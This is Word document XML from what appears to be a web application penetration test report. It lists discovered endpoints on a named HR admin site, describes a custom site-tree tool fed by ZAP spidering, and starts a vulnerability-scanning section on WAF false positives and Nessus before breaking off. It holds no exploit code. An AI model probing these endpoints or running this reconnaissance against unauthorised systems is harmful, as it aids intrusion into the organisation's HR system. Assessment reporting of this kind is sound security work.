    <w:p w14:paraId="406A0951" w14:textId="13E4F74F" w:rsidR="0008579E" w:rsidRPr="00FB54E7" w:rsidRDefault="00B17FFD" w:rsidP="00FB54E7">
      <w:r>
        <w:t xml:space="preserve">Based on the </w:t>
      </w:r>
      <w:r w:rsidR="00831FA3">
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidR="00BB06DA">
        <w:t>put</w:t>
      </w:r>
      <w:r>
        <w:t>, these are some notable findings</w:t>
      </w:r>
      <w:r w:rsidR="009B291E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C669B">
        <w:t>that were verified</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A6380E" w14:paraId="0F507103" w14:textId="77777777" w:rsidTr="00E1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05D887" w14:textId="77777777" w:rsidR="00A6380E" w:rsidRDefault="00A6380E" w:rsidP="00E16B00">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>URL Links</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A6380E" w14:paraId="1C6224FF" w14:textId="77777777" w:rsidTr="00E1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0C3BE3" w14:textId="42D45EAF" w:rsidR="00A6380E" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="00E16B00">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId63" w:history="1">
              <w:r w:rsidR="00A6380E" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00125114" w:rsidRPr="00125114">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>ApiController</w:t>
            </w:r>
            <w:r w:rsidR="00125114">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00125114" w:rsidRPr="00125114">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>AttendanceTaking1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A6380E" w14:paraId="254D4BF1" w14:textId="77777777" w:rsidTr="00E16B00">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C320095" w14:textId="5E9479E7" w:rsidR="00A6380E" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="00E16B00">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId64" w:history="1">
              <w:r w:rsidR="0074563F" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="0074563F" w:rsidRPr="00BD139E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>index.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A6380E" w14:paraId="0C6E10BB" w14:textId="77777777" w:rsidTr="00E1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67211D" w14:textId="59DA8E1E" w:rsidR="00A6380E" w:rsidRPr="00F835E2" w:rsidRDefault="00000000" w:rsidP="00E16B00">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId65" w:history="1">
              <w:r w:rsidR="0074563F" w:rsidRPr="00F835E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="0074563F" w:rsidRPr="00BD139E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>index.php</w:t>
            </w:r>
            <w:r w:rsidR="0074563F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="0074563F" w:rsidRPr="00BD139E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>reimbursment</w:t>
            </w:r>
            <w:r w:rsidR="0074563F">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="0074563F" w:rsidRPr="00BD139E">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>get_category</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A6380E" w14:paraId="7B7271F7" w14:textId="77777777" w:rsidTr="00E16B00">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75849C70" w14:textId="11AF67B6" w:rsidR="00A6380E" w:rsidRPr="00E41A99" w:rsidRDefault="00000000" w:rsidP="00E41A99">
            <w:hyperlink r:id="rId66" w:history="1">
              <w:r w:rsidR="00E41A99" w:rsidRPr="00E41A99">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/reimbursment/get_ctg_id/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00E41A99" w:rsidRPr="00E41A99">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A6380E" w14:paraId="2060863B" w14:textId="77777777" w:rsidTr="00E1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8B058B" w14:textId="7F0BE91B" w:rsidR="00A6380E" w:rsidRPr="00B05AFD" w:rsidRDefault="00000000" w:rsidP="00E16B00">
            <w:pPr>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId67" w:history="1">
              <w:r w:rsidR="00B05AFD" w:rsidRPr="00B05AFD">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>https://hrcms-admin.tri-niche.com/index.php/reimbursment/get/</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B05AFD" w:rsidRPr="00B05AFD">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26755E36" w14:textId="77777777" w:rsidR="00D15C5D" w:rsidRDefault="00D15C5D" w:rsidP="00D15C5D">
      <w:bookmarkStart w:id="43" w:name="_Toc93487287"/>
      <w:bookmarkStart w:id="44" w:name="_Toc93502862"/>
    </w:p>
    <w:p w14:paraId="06CDA389" w14:textId="77777777" w:rsidR="00D15C5D" w:rsidRDefault="00D15C5D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68373678" w14:textId="7FAC0F23" w:rsidR="004C44DA" w:rsidRDefault="004C44DA" w:rsidP="00750543">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc93526895"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>TreeViewGenerator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
      <w:bookmarkEnd w:id="44"/>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="7BDC0CFE" w14:textId="78E921BC" w:rsidR="00251748" w:rsidRDefault="00251748" w:rsidP="00251748">
      <w:r>
        <w:t xml:space="preserve">This is a custom tool created to easily visualize the hierarchy of the web application using a list of URLs. </w:t>
      </w:r>
      <w:r w:rsidR="007F7417">
        <w:t xml:space="preserve">The list </w:t>
      </w:r>
      <w:r w:rsidR="00EA2839">
        <w:t xml:space="preserve">used was the output of the Spidering session </w:t>
      </w:r>
      <w:r w:rsidR="00636913">
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="00EA2839">
        <w:t xml:space="preserve"> ZAP.</w:t>
      </w:r>
      <w:r w:rsidR="007F7417">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The tool automatically processes the list and creates a site tree for ease of navigation through the directories. This was effective in </w:t>
      </w:r>
      <w:r w:rsidR="003E074E">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> construction of the sitemap and visualization of the web application. This tool is not a scanner itself and requires other tools such as Dirb and ZAP to produce a list of URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C7D8FC" w14:textId="2A59E56E" w:rsidR="00251748" w:rsidRPr="00AE2650" w:rsidRDefault="00251748" w:rsidP="00AE2650">
      <w:r>
        <w:t>It was especially useful in discovering pages th</w:t>
      </w:r>
      <w:r w:rsidR="001D019D">
        <w:t xml:space="preserve">at </w:t>
      </w:r>
      <w:r w:rsidR="008F2671">
        <w:t>inter</w:t>
      </w:r>
      <w:r w:rsidR="003C3F39">
        <w:t>act</w:t>
      </w:r>
      <w:r w:rsidR="001D019D">
        <w:t xml:space="preserve"> with the </w:t>
      </w:r>
      <w:r>
        <w:t>controller within the web application and logically visualize the flow of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5194"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B1647" w14:paraId="766DCF78" w14:textId="77777777" w:rsidTr="00251748">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4678" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66896167" w14:textId="19D483DC" w:rsidR="005247EB" w:rsidRDefault="006B1647" w:rsidP="00045DE0">
            <w:r w:rsidRPr="006B1647">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08D35881" wp14:editId="5A105E58">
                  <wp:extent cx="2652889" cy="2984500"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="18946397" name="Picture 1894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8081" cy="2990341"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4682" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F6A91F2" w14:textId="1251EB66" w:rsidR="005247EB" w:rsidRDefault="00D14253" w:rsidP="00251748">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D14253">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BC064BF" wp14:editId="06C52E74">
                  <wp:extent cx="3342640" cy="2946400"/>
                  <wp:effectExtent l="0" t="0" r="0" b="6350"/>
                  <wp:docPr id="18946396" name="Picture 1894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2573"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3391227" cy="2989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8B1E2F" w14:textId="77777777" w:rsidR="00772AA7" w:rsidRDefault="00772AA7" w:rsidP="00130DEB"/>
    <w:p w14:paraId="5B2D91EA" w14:textId="7E44B768" w:rsidR="00A003E9" w:rsidRPr="00035709" w:rsidRDefault="002933F9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4399CB" w14:textId="77777777" w:rsidR="00A003E9" w:rsidRDefault="00A003E9" w:rsidP="00A87390">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc93487288"/>
      <w:bookmarkStart w:id="47" w:name="_Toc93502863"/>
      <w:bookmarkStart w:id="48" w:name="_Toc93526896"/>
      <w:r w:rsidRPr="00CB3026">
        <w:lastRenderedPageBreak/>
        <w:t>Sitemap</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p w14:paraId="66D1A24B" w14:textId="2ABEAC82" w:rsidR="00F259A7" w:rsidRPr="00F259A7" w:rsidRDefault="00F259A7" w:rsidP="00F259A7">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> The Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D39D6D8" w14:textId="08AB86B0" w:rsidR="00B0280C" w:rsidRDefault="00E51D34" w:rsidP="00E77D9E">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>The results</w:t>
      </w:r>
      <w:r w:rsidR="001C2EA5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00803E69">
        <w:t xml:space="preserve">of mapping the web application through </w:t>
      </w:r>
      <w:r w:rsidR="00D12A29">
        <w:t xml:space="preserve">discovering all available links </w:t>
      </w:r>
      <w:r w:rsidR="007F63E7">
        <w:t xml:space="preserve">and hidden directories are compiled and </w:t>
      </w:r>
      <w:r w:rsidR="00716EA1">
        <w:t xml:space="preserve">constructed </w:t>
      </w:r>
      <w:r w:rsidR="00C604BB">
        <w:t>into the sitemap depicted below.</w:t>
      </w:r>
      <w:r w:rsidR="00150733">
        <w:t xml:space="preserve"> The purpose of this sitemap is to identify potential weaknesses </w:t>
      </w:r>
      <w:r w:rsidR="00DD1795">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00150733">
        <w:t xml:space="preserve"> misconfiguration</w:t>
      </w:r>
      <w:r w:rsidR="00400F1D">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00150733">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D08EB">
        <w:t>within the web application</w:t>
      </w:r>
      <w:r w:rsidR="00FB0A37">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C22E99" w:rsidRPr="00C22E99">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C776C" w14:textId="34F9ED33" w:rsidR="00B84872" w:rsidRDefault="004B00C3" w:rsidP="00045DE0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FCF4CC1" wp14:editId="433AF625">
            <wp:extent cx="5848895" cy="2096219"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946383" name="Picture 189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6713" cy="2109773"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="687B0517" w14:textId="77777777" w:rsidR="00B84872" w:rsidRDefault="00B84872" w:rsidP="00B84872"/>
    <w:p w14:paraId="19180192" w14:textId="5EC548D9" w:rsidR="00B6523E" w:rsidRDefault="00D46C24" w:rsidP="00687846">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="49" w:name="_Toc93487289"/>
      <w:bookmarkStart w:id="50" w:name="_Toc93502864"/>
      <w:bookmarkStart w:id="51" w:name="_Toc93526897"/>
      <w:bookmarkStart w:id="52" w:name="_Toc94100222"/>
      <w:r w:rsidRPr="37E5898C">
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Vulnerability Scanning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="391A78D3" w14:textId="36307E15" w:rsidR="00AB367D" w:rsidRPr="00AB367D" w:rsidRDefault="006F1379" w:rsidP="00E77D9E">
      <w:r>
        <w:t>During the process of vulnerability scanning, the combination of both automated and manual testing</w:t>
      </w:r>
      <w:r w:rsidR="00E308EF">
        <w:t xml:space="preserve"> tools </w:t>
      </w:r>
      <w:r w:rsidR="005437BE">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="00E308EF">
        <w:t xml:space="preserve"> used to fully determine the weaknesses of the web application.</w:t>
      </w:r>
      <w:r w:rsidR="00D570FB">
        <w:t xml:space="preserve"> This section discusses the </w:t>
      </w:r>
      <w:r w:rsidR="009948A5">
        <w:t xml:space="preserve">various methods, tools, and </w:t>
      </w:r>
      <w:r w:rsidR="002004C2">
        <w:t>actions taken in discovering vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1059B436" w14:textId="77777777" w:rsidR="007B3C7C" w:rsidRDefault="007B3C7C" w:rsidP="007B3C7C"/>
    <w:p w14:paraId="5C4CD65F" w14:textId="5ED73B1E" w:rsidR="00831415" w:rsidRDefault="007B3C7C" w:rsidP="00831415">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc93502865"/>
      <w:bookmarkStart w:id="54" w:name="_Toc93526898"/>
      <w:bookmarkStart w:id="55" w:name="_Toc94100223"/>
      <w:r>
        <w:t>Automated Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="1D21FEBD" w14:textId="6C5711A1" w:rsidR="00B84872" w:rsidRPr="0023673B" w:rsidRDefault="006D22A6">
      <w:r>
        <w:t xml:space="preserve">Through the usage of automated scanning tools, </w:t>
      </w:r>
      <w:r w:rsidR="00673961">
        <w:t>multiple potential vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00B47AC4">
        <w:t xml:space="preserve"> within the web application</w:t>
      </w:r>
      <w:r w:rsidR="00C07576">
        <w:t xml:space="preserve"> had been detected</w:t>
      </w:r>
      <w:r w:rsidR="00673961">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00053420">
        <w:t xml:space="preserve"> However, since </w:t>
      </w:r>
      <w:r w:rsidR="008C57B5">
        <w:t xml:space="preserve">automated tools work </w:t>
      </w:r>
      <w:r w:rsidR="00742C62">
        <w:t xml:space="preserve">by </w:t>
      </w:r>
      <w:r w:rsidR="00E2658C">
        <w:t xml:space="preserve">scanning and sending multiple </w:t>
      </w:r>
      <w:r w:rsidR="00FA6E75">
        <w:t>requests</w:t>
      </w:r>
      <w:r w:rsidR="00E2658C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA6E75">
        <w:t>to the web application, which</w:t>
      </w:r>
      <w:r w:rsidR="00100411">
        <w:t xml:space="preserve"> can</w:t>
      </w:r>
      <w:r w:rsidR="00FA6E75">
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidR="00100411">
        <w:t xml:space="preserve"> happen simultaneously</w:t>
      </w:r>
      <w:r w:rsidR="00FA6E75">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003C449D">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00FA6E75">
        <w:t xml:space="preserve"> had resulted in some false positive alerts due to the Web Application Firewall. After numerous requests, the IP address would be deemed malicious and blocked until a </w:t>
      </w:r>
      <w:r w:rsidR="006E596C">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00FA6E75">
        <w:t xml:space="preserve">eCAPTCHA is submitted. </w:t>
      </w:r>
      <w:r w:rsidR="00DF2634">
        <w:t xml:space="preserve">For example, if </w:t>
      </w:r>
      <w:r w:rsidR="00805A69">
        <w:t>the scanner sends an</w:t>
      </w:r>
      <w:r w:rsidR="00DF2634">
        <w:t xml:space="preserve"> injection payload</w:t>
      </w:r>
      <w:r w:rsidR="004F34AC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B72E4">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00DF2634">
        <w:t xml:space="preserve"> insert</w:t>
      </w:r>
      <w:r w:rsidR="00334A5E">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DF2634">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A020F6">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00DF2634">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00E12B2E">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00DF2634">
        <w:t xml:space="preserve"> the URL</w:t>
      </w:r>
      <w:r w:rsidR="004F34AC">
        <w:t xml:space="preserve"> to test for a certain vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00DF2634">
        <w:t xml:space="preserve"> after being blocked, it </w:t>
      </w:r>
      <w:r w:rsidR="00460F0B">
        <w:t xml:space="preserve">redirects to the </w:t>
      </w:r>
      <w:r w:rsidR="00671228">
        <w:t xml:space="preserve">verification page </w:t>
      </w:r>
      <w:r w:rsidR="00374B32">
        <w:t>which w</w:t>
      </w:r>
      <w:r w:rsidR="000C4FF4">
        <w:t>ould</w:t>
      </w:r>
      <w:r w:rsidR="00671228">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007046AD">
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidR="00671228">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF40BD">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="0022727F">
        <w:t xml:space="preserve">successful response </w:t>
      </w:r>
      <w:r w:rsidR="007046AD">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="008F2671">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="00C8026C">
        <w:t>marked as vulnerable</w:t>
      </w:r>
      <w:r w:rsidR="00B37C2A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002143D5">
        <w:t xml:space="preserve">despite not being </w:t>
      </w:r>
      <w:r w:rsidR="001E7456">
        <w:t>at risk</w:t>
      </w:r>
      <w:r w:rsidR="00DF40BD">
        <w:t xml:space="preserve">. Hence, </w:t>
      </w:r>
      <w:r w:rsidR="00B37C2A">
        <w:t xml:space="preserve">manual testing would be </w:t>
      </w:r>
      <w:r w:rsidR="00493FAE">
        <w:t>carried out</w:t>
      </w:r>
      <w:r w:rsidR="00EB7589">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00457CE9">
        <w:t>later</w:t>
      </w:r>
      <w:r w:rsidR="00B37C2A">
        <w:t xml:space="preserve"> to verify the vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="002006A6">
        <w:t xml:space="preserve"> and discover other weaknesses</w:t>
      </w:r>
      <w:r w:rsidR="00B37C2A">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkStart w:id="56" w:name="_Toc93487290"/>
      <w:bookmarkStart w:id="57" w:name="_Toc93502866"/>
    </w:p>
    <w:p w14:paraId="612CAC36" w14:textId="2D6F2D1A" w:rsidR="00743A5F" w:rsidRDefault="001E2765" w:rsidP="007B3C7C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc93526899"/>
      <w:bookmarkStart w:id="59" w:name="_Toc94100224"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nessus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="4ABD7A38" w14:textId="5BEAC575" w:rsidR="00D5750C" w:rsidRPr="00D5750C" w:rsidRDefault="00D5750C" w:rsidP="00D5750C">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E94824">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Colin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B33222E" w14:textId="03404521" w:rsidR="00EF020B" w:rsidRDefault="002B19E4" w:rsidP="00E77D9E">
      <w:r>
        <w:t xml:space="preserve">Nessus is a remote security scanning tool </w:t>
      </w:r>
      <w:r w:rsidR="008F2671">
        <w:t>that</w:t>
      </w:r>
      <w:r w:rsidR="00B46F0A">
        <w:t xml:space="preserve"> can be</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E7D0B">
        <w:t>installed on</w:t>
      </w:r>
      <w:r w:rsidR="00721051">
        <w:t xml:space="preserve"> any system</w:t>
      </w:r>
      <w:r w:rsidR="00CF55F3">
        <w:t xml:space="preserve"> to scan </w:t>
      </w:r>
      <w:r w:rsidR="00383804">
        <w:t xml:space="preserve">other systems </w:t>
      </w:r>
      <w:r w:rsidR="00267C03">
        <w:t>to search for vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="00400A5E">
        <w:t xml:space="preserve"> that could be used </w:t>
      </w:r>
      <w:r w:rsidR="004A54A8">
        <w:t xml:space="preserve">by malicious hackers </w:t>
      </w:r>
      <w:r w:rsidR="00775B92">
        <w:t>to gain access to the system or network.</w:t>
      </w:r>
      <w:r w:rsidR="003C0BF2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA5930">
        <w:t xml:space="preserve">Nessus compiles </w:t>
      </w:r>
      <w:r w:rsidR="00254E42">
        <w:t xml:space="preserve">plugins which </w:t>
      </w:r>
      <w:r w:rsidR="004C5A09">
        <w:t>contain</w:t>
      </w:r>
      <w:r w:rsidR="00254E42">
